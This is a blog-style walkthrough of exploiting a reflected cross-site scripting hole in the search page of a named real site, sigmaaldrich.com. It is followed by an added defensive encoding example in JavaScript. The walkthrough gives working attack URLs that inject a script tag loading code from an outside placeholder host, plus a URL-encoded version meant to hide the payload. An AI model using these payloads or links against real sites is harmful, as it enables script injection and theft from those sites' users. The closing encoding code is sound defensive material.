Fortunately for us, sigmaaldrich.com has a search option. Because search engines generally accept a wide array of characters and display some form of the original search string on the results page, they are an excellent attack vector for cross-site scripting. To see what sort of encoding the search goes through, we're going to use a special string:
testA.,:;\'"<>()[]{}
After searching for the string, view the source of the results page and search for testA within the code. The first match should look like the JavaScript below.
cmCreatePageviewTag("Result Page: Product Results","SS6", "Keyword (fulltext)|testA.,:;\'"<>()[]{}|", "2");
Here we can see an unencoded, exact match of our search inside a JavaScript string. This means we have free rein to terminate the string (as the test string already did), finish the function call, and inject our own code. However, since the less-than and greater-than characters also survive unencoded, we should look further to see what else can be done. The next match of the search string is even more promising.
That Match Your Search for "testA.,:;\'"<>()[]{}"
We're still free of encoding, and in this instance of the search string we can easily inject an HTML script tag referencing a JavaScript file on another server. For testing purposes our script only contains an alert. The code that will be injected is shown below.
<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>
Note that the address in this sample doesn't actually point to anything; you'll need to replace it with your own.
Next, in the URL of the results page we replace the search string with the code we want to inject. The result should look like this:
http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=mode+matchpartialmax&N4=<script type='text/javascript' src='http://www.yourdomain.com/test.js'></script>
When we navigate to this URL, an alert should pop up letting us know that our off-site code has run successfully.
To better hide the payload and improve browser compatibility we can URL-encode the JavaScript, resulting in a link similar to this:
http://www.sigmaaldrich.com/catalog/Lookup.do?N5=Keyword%20(fulltext)&N3=%3C%73%63%72%69%70%74%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%72%64%6F%6D%61%69%6E%2E%63%6F%6D%2F%74%65%73%74%2E%6A%73%27%3E%3C%2F%73%63%72%69%70%74%3E
And that's it. XSS is a simple, powerful reminder to properly encode all user-entered data for the context it is rendered into.
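As an added example (not code from the original post or from the site in question), here is how the two reflection points described above are neutralised with context-aware output encoding: one encoder for the JavaScript string argument of cmCreatePageviewTag and one for the HTML heading. It assumes a Node.js-style environment and a hypothetical renderResultsPage function standing in for the server-side template.

```javascript
// Added example: context-aware output encoding for the two reflection points
// discussed in the post. The probe string is the one used in the write-up.
const TEST_STRING = "testA.,:;\\'\"<>()[]{}";

// HTML text context ("That Match Your Search for ..."): escape the characters
// that can open a tag, close an attribute, or end a comment.
function encodeHtml(s) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// JavaScript string-literal context (cmCreatePageviewTag argument): allow-list
// alphanumerics and a few punctuation marks, \uXXXX-escape everything else.
// Escaping "<" as \u003C also stops "</script>" from ending the script block.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ,.\-_]/g, (c) => {
    const hex = c.charCodeAt(0).toString(16).toUpperCase().padStart(4, "0");
    return "\\u" + hex;
  });
}

// Hypothetical server-side rendering of the two fragments from the post,
// with each value encoded for the context it lands in.
function renderResultsPage(query) {
  const jsArg = "Keyword (fulltext)|" + encodeJsString(query) + "|";
  const script =
    'cmCreatePageviewTag("Result Page: Product Results","SS6", "' +
    jsArg + '", "2");';
  const heading = 'That Match Your Search for "' + encodeHtml(query) + '"';
  return { script, heading };
}

// Defender's check: the rendered script must still have exactly the eight
// quote characters the template itself contains, i.e. the query added none.
function scriptQuoteCount(rendered) {
  return (rendered.match(/"/g) || []).length;
}

const page = renderResultsPage(TEST_STRING);
console.log(page.script);
console.log(page.heading);
```

Run with the probe string and neither fragment contains a raw quote, backslash or angle bracket from the input, so the string-termination and tag-injection paths described above are closed.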